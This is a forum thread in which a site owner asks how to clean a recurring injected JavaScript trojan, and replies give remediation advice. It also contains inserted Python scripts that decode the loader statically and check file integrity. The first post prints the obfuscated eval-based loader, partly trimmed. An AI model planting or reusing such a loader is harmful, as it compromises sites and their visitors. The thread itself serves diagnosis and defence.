
Thread: website has kryptic trojan - how do I remove

  1. #1 dkchapuis (SitePoint Zealot, Oklahoma, USA)

    website has kryptic trojan - how do I remove

    A website that is built in Dreamweaver has a kryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with ESET and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


    Here is the script that gets added to each page.
    Code JavaScript:
    <!--0242d5--><script type="text/javascript" language="javascript" >
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
    .......
    7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
    any help would be appreciated.
    Last edited by Mittineague; Apr 12, 2013 at 13:59. Reason: please don't post mal code
    Master of going the long way to get nowhere
    Web Design Muskogee, Oklahoma
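The loader posted above can be read without ever running it. As written it only reaches `eval` after `document.body&=0.1` throws and `document` is still defined, i.e. inside a real browser, so a sandbox without a DOM never sees the payload; decoding the string statically sidesteps that check. What follows is an added example for this thread, not code from the poster or from any product: it mirrors the loader's own decode step (`@` stands for `9`, then `!`-separated hex character codes) on the head and tail fragments that survived the moderator's trim, and scans a constructed sample page for the same marker-comment wrapping. The sample page and its harmless payload are constructed for the example; the decoded text of the real payload's middle is not recoverable from this page.

```python
import re

# Head and tail of the encoded string exactly as they appear in post #1; the
# middle was removed by the moderator, so only these fragments can be decoded.
# (The cut-off trailing token "2" on the first line is dropped.)
HEAD = ("28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63"
        "!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28")
TAIL = "7d!d!a!7d!2@!28!2@!3b"

# Shape of the loader's own decode call:  "...".replace(/@/g,"9").split("!")
ENCODED_RE = re.compile(r'"([0-9a-f@!]+)"\.replace\(/@/g,"9"\)\.split\("!"\)')
# The injected block is wrapped in a comment pair sharing six hex digits.
BLOCK_RE = re.compile(r"<!--([0-9a-f]{6})-->(.*?)<!--/\1-->", re.S)


def decode_payload(encoded: str) -> str:
    """Mirror the loader: '@' means '9', then '!'-separated hex char codes.
    Unlike the loader, the result is returned as text, never passed to eval."""
    tokens = encoded.replace("@", "9").split("!")
    return "".join(chr(int(tok, 16)) for tok in tokens if tok)


def encode_payload(text: str) -> str:
    """Inverse transform; used only to build the constructed sample below."""
    return "!".join(format(ord(ch), "x") for ch in text).replace("9", "@")


def extract_loaders(html: str) -> list:
    """Return (marker, decoded payload) for every wrapped loader block in html."""
    found = []
    for block in BLOCK_RE.finditer(html):
        m = ENCODED_RE.search(block.group(2))
        if m:
            found.append((block.group(1), decode_payload(m.group(1))))
    return found


# Constructed sample page (not from the thread): same marker wrapping and decode
# stub as the real injection, but the payload is a harmless constructed string.
SAMPLE_PAYLOAD = "(function () {\r\n    var c = document.createElement('b');\r\n})();"
SAMPLE_PAGE = (
    "<html><body><p>site content</p>\n"
    '<!--0242d5--><script type="text/javascript">'
    'p=parseInt;ss=String.fromCharCode;asgq="' + encode_payload(SAMPLE_PAYLOAD)
    + '".replace(/@/g,"9").split("!");</script><!--/0242d5-->\n'
    "</body></html>"
)

if __name__ == "__main__":
    print(repr(decode_payload(HEAD)))
    print(repr(decode_payload(TAIL)))
    for marker, payload in extract_loaders(SAMPLE_PAGE):
        print(marker, repr(payload))
```

The decoded head reads `(function () {\r\n    var c = document.createElement(` and the tail `}\r\n})();`, which is consistent with the loop in the loader walking all 449 tokens and handing the result to `eval`: the payload is a self-invoking function that builds a DOM element, typically an injected iframe or script tag. Run `extract_loaders` over every file the scanner flags to confirm all copies carry the same marker and payload.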

  2. #2 TechnoBear (Argyll, Scotland)
    I can't help with finding the source, but if you change your file permissions to read only, it might help to stop them being altered while you track it down.
    If you're a bear made of mohair, ponder on the nature of a mo.

  3. #3 xhtmlcoder (Robert Wellock)
    Perhaps you could try the http://www.bleepingcomputer.com/ Security forums since you haven't located the infection vector. Also change your passwords.
    };-) http://www.xhtmlcoder.com/
    Thinking Web: Voices of the Community


  4. #4 dklynn (Certified Ethical Hacker, Auckland)
    Quote Originally Posted by dkchapuis View Post
    A website that is built in Dreamweaver has a kryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with ESET and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.

    Here is the script that gets added to each page.
    [script snipped; see post #1]
    any help would be appreciated.
    dk

    Your problem is that you have a breach in your security so (repeat of an earlier post):

    1. Immediately delete all FTP access except one (master for the account).

    2. Change the master password (cPanel and FTP) to a VERY STRONG one using an http://strongpasswordgenerator.com password of sufficient length.

    3. Use maldet scans (on an Apache server) which find and report all forms of malware (viruses, worms and SCRIPTS which can cause problems). This will enable you to find and remove scripts which can be embedded in html, php and js scripts. Repeat the maldet scans until there are no files detected then add a CRON to run maldet scans on a regular basis. Be aware that recovery will primarily consist of DELETING all html, php and js files and replacing them with originals (from your master copies).

    4. Additionally, I use a script (via CRON) to verify that files have remained unchanged over the last xx hours for "peace of mind."

    5. Database: If you are running WordPress or the like (database verification for admin accounts), create a new admin and delete all other admin records.

    6. Update all "canned scripts" (e.g., WP, Zencart, etc.) and be sure that they're kept updated in order to prevent further attacks via security problems discovered in those scripts. This includes their third party plug-ins, too.

    7. Uploaded files: Be sure to do a thorough check of any file uploaded to your website (I limit uploaded files to images and they are resized by GD before being saved to my "webspace").

    Both staff members' suggestions are good but too limited in scope. What you're allowing with JS like this is a barrage of SPAM being sent from your account. If you fail to close the security breach, your host should suspend your account then, failing application of good security, TERMINATE your account for breach of T&C (spamming).

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    Updated mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator
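Steps 3 and 4 of the post above (scan for embedded scripts, then verify on a schedule that the html/php/js files have not changed) can be covered by one small script run from cron. The following is an added example written for this thread, not DK's own script and not part of maldet: it records a SHA-256 baseline of every html, php and js file, reports anything added, removed or changed on the next run, and flags files carrying the six-hex-digit comment-marker wrapping seen in post #1. The `demo()` function builds a throwaway site in a temp directory and re-infects it so the logic can be exercised offline; paths, file names and the appended block in it are constructed for the example.

```python
import hashlib
import json
import re
import sys
import tempfile
from pathlib import Path

# Extensions the thread says the injection lands in (html, php and js).
WATCHED = {".html", ".htm", ".php", ".js"}

# The loader in post #1 sat between <!--0242d5--> and <!--/0242d5-->; the six
# digits vary from site to site, so match the shape rather than the value.
INJECTION_RE = re.compile(
    r"<!--([0-9a-f]{6})-->\s*<script\b.*?</script>\s*<!--/\1-->", re.S | re.I
)


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict:
    """Map every watched file under root (posix-style relative path) to its hash."""
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in WATCHED
    }


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Pure comparison of two hash maps: what appeared, vanished or changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
    }


def find_injections(text: str) -> list:
    """Marker ids of every wrapped loader block found in one file's text."""
    return [m.group(1) for m in INJECTION_RE.finditer(text)]


def strip_injections(text: str) -> str:
    """Remove the wrapped blocks; the post's advice still applies: replace the
    file from a clean master copy rather than trusting the stripped one."""
    return INJECTION_RE.sub("", text)


def demo() -> dict:
    """Constructed walk-through in a temp dir: baseline, re-infect, detect."""
    root = Path(tempfile.mkdtemp(prefix="site-"))
    (root / "index.html").write_text("<html><body><p>hello</p></body></html>")
    (root / "js").mkdir()
    (root / "js" / "app.js").write_text("console.log('ok');")
    (root / "readme.txt").write_text("not watched")  # wrong extension, ignored
    baseline = hash_tree(root)

    # Simulated re-infection: a loader block with the same marker shape as the
    # one in post #1 (harmless placeholder body) plus a dropped new file.
    injected = ('<!--0242d5--><script type="text/javascript">/* payload */'
                "</script><!--/0242d5-->")
    with (root / "index.html").open("a") as f:
        f.write(injected)
    (root / "js" / "dropped.js").write_text("/* new */")

    current = hash_tree(root)
    report = diff_baseline(baseline, current)
    report["injected"] = {}
    for rel in report["changed"] + report["added"]:
        ids = find_injections((root / rel).read_text(errors="replace"))
        if ids:
            report["injected"][rel] = ids
    return report


if __name__ == "__main__":
    # Usage (hypothetical paths):
    #   python integrity.py baseline /var/www/site /root/baseline.json
    #   python integrity.py check    /var/www/site /root/baseline.json
    cmd, root, store = sys.argv[1], Path(sys.argv[2]), Path(sys.argv[3])
    if cmd == "baseline":
        store.write_text(json.dumps(hash_tree(root), indent=1))
    elif cmd == "check":
        report = diff_baseline(json.loads(store.read_text()), hash_tree(root))
        report["injected"] = {}
        for rel in report["changed"] + report["added"]:
            ids = find_injections((root / rel).read_text(errors="replace"))
            if ids:
                report["injected"][rel] = ids
        print(json.dumps(report, indent=1))
        sys.exit(1 if report["added"] or report["removed"] or report["changed"] else 0)
```

Keep the baseline file outside the web root and owned by a user the FTP account cannot write as; if the attacker can rewrite the baseline alongside the pages, the check proves nothing. A cron entry running `check` every few hours and mailing the JSON on a non-zero exit gives the "files unchanged over the last xx hours" assurance the post describes, and a file that changed without the marker being present still deserves a look, since the next payload may be wrapped differently.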
